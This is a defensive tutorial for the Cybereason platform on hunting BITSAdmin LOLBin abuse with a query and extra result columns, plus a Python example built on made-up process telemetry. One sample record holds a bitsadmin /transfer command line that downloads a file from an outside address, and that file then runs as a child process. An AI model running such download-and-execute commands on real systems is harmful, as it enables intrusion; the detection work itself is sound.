Customize Query Results - Tutorial

In this tutorial, we explain, step-by-step, how to customize the investigation query results you receive by adding columns in the query builder.

For the tutorial scenario, we use a sample query that searches for instances of the BITSAdmin LOLBin technique. The BITSAdmin utility is a command-line tool included as part of the Windows operating system that enables you to create and monitor BITS jobs on the machine. Use of this utility is one of the most popular LOLBin attacks used by malicious actors, as an attacker can use the BITSAdmin utility to launch a malicious process, download files, upload files from a compromised host, and so forth.

One of the powerful parts of the Cybereason platform’s Cross Machine Correlation (CMC) engine is its integrated and correlated data model. In this model, the Cybereason platform not only correlates information about a specific Element (for example, process details for a Process) but also correlates data about other Elements related to that Element (such as Connections for a Process, Processes related to a Process, Machines related to a Process, and so forth).

Because of this correlation, you do not need to spend time analyzing results from a specific query and then cross-referencing details from those results to results from another query for a different Element. This saves you considerable time and enables you to quickly see relationships between all parts of your organization and different events happening in your environment.

When you build a query, you can return related Features from another Element (such as connections for a process, machines for a process, and so forth) simply by adding specific columns to the results for the query.

Step 1: Create the query

For this tutorial, you create a query to find instances of the BITSAdmin LOLBin technique. Once you have the query, you can then add more columns to return related information about instances of the BITSAdmin utility.

To build the query, follow these steps:

  1. In your Cybereason platform, navigate to the Investigation screen.

  2. In the Investigation screen, add a Process Element.

  3. Below the Process Element, in the Search for filters field, enter Process name and select it from the dropdown list.

  4. Select contains.

  5. Enter bitsadmin.exe for the value for the Process name filter.

  6. Next to the bitsadmin.exe value, enter Command line and select it from the dropdown list.

  7. Select contains.

  8. Enter add file OR transfer OR download for the values.

Your query should look like this:

Sample query for tutorial on how to customize query results

Add additional columns

For the results, given what we know about the use of the BITSAdmin utility by attackers, there are potentially a few worthwhile items to investigate:

  • Child processes launched by BITSAdmin

  • Files opened by the BITSAdmin utility

  • Connections made by the utility

  • Machines on which the utility was run (as there are also instances where the utility is used legitimately)

Given these criteria, there are numerous different columns to add as part of the query results.

To add relevant columns, follow these steps:

  1. Below the query builder, above the results area, click Edit columns.

  2. In the Edit columns dialog box, in the upper-right corner, in the Search all columns field, enter Children. The Cybereason platform displays a list of related Features.

  3. From the list of columns, select Children.

    Select the Children column for our sample query

    This adds the Children column to the list of results. This column is only visible when you run the query.

  4. Repeat steps 2 and 3 to add additional columns:

    • Owner machine: The machine on which the instance of the BITSAdmin utility was found.

    • Connections: A list of connections made by instances of the BITSAdmin utility.

    • Opened files: A list of files opened by the BITSAdmin utility.

    • Has external connection, Has internal connection, Has outgoing connection: Indicates whether the instance of the BITSAdmin utility has opened internal, external, or outgoing connections.

    There are numerous additional columns (Features) available to use with this query. However, the columns we have added can sufficiently provide some initial data for our query example.

    All additional columns selected

  5. Run the query.
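As an added example (not Cybereason's code, query language or API), the following expresses the query from Step 1 together with the columns added in this section as a filter over constructed process records, so the filter semantics and the related-Element columns can be checked offline. It assumes that the contains filter matches case-insensitively and that "internal" means RFC 1918 address space.

```python
import ipaddress
NAME_TERM = "bitsadmin.exe"
CMDLINE_TERMS = ("add file", "transfer", "download")   # Step 8 of the tutorial, verbatim
# Assumption: "internal" means RFC 1918 address space; anything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample telemetry (values invented), one record per process,
# carrying the related Elements the tutorial adds as columns.
PROCESSES = [
    {"pid": 101, "name": "bitsadmin.exe", "machine": "WS-01",
     "cmdline": "bitsadmin.exe /transfer job1 /download http://203.0.113.5/a.bin C:\\Users\\Public\\a.bin",
     "children": [102], "connections": ["203.0.113.5:80"], "opened_files": ["C:\\Users\\Public\\a.bin"]},
    {"pid": 102, "name": "a.bin", "machine": "WS-01", "cmdline": "C:\\Users\\Public\\a.bin",
     "children": [], "connections": [], "opened_files": []},
    {"pid": 103, "name": "bitsadmin.exe", "machine": "SRV-02",
     "cmdline": "bitsadmin.exe /list /allusers",               # enumeration only; not matched
     "children": [], "connections": [], "opened_files": []},
    {"pid": 104, "name": "BITSADMIN.EXE", "machine": "WS-03",
     "cmdline": "BITSADMIN.EXE /Transfer job2 http://10.20.30.40/b.txt C:\\temp\\b.txt",
     "children": [], "connections": ["10.20.30.40:80"], "opened_files": ["C:\\temp\\b.txt"]},
]

def contains_any(value, terms):
    """Case-insensitive 'contains' over OR-ed terms (assumed filter semantics)."""
    return any(t.lower() in value.lower() for t in terms)

def matches_query(proc):
    """Step 1: Process name contains bitsadmin.exe AND Command line contains add file OR transfer OR download."""
    return contains_any(proc["name"], (NAME_TERM,)) and contains_any(proc["cmdline"], CMDLINE_TERMS)

def is_internal(conn):
    host = ipaddress.ip_address(conn.rsplit(":", 1)[0])   # connections are "ip:port" strings
    return any(host in net for net in INTERNAL_NETS)

def add_columns(proc, by_pid):
    """The columns added in this section, resolved from related records the way the correlated data model presents them."""
    conns = proc["connections"]
    return {
        "Children": [by_pid[c]["name"] for c in proc["children"] if c in by_pid],
        "Owner machine": proc["machine"],
        "Connections": list(conns),
        "Opened files": list(proc["opened_files"]),
        "Has external connection": any(not is_internal(c) for c in conns),
        "Has internal connection": any(is_internal(c) for c in conns),
        "Has outgoing connection": bool(conns),   # assumption: every recorded connection is outgoing
    }

def run_query(processes=PROCESSES):
    by_pid = {p["pid"]: p for p in processes}
    return [add_columns(p, by_pid) for p in processes if matches_query(p)]
```

Because contains is literal substring matching, a term with a space such as add file only matches command lines that spell it that way.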

View the results

After you have built the query and selected the columns, when you run the query, the Cybereason platform returns the matching process instances and also adds a column for each item you selected in the Edit columns dialog box.

Look at the results to see related information for each column:

Relevant columns displayed in the results.

Each of these columns adds data about related Elements directly to the process results instance, in addition to the details you can view in the Element Details screen for a particular results instance.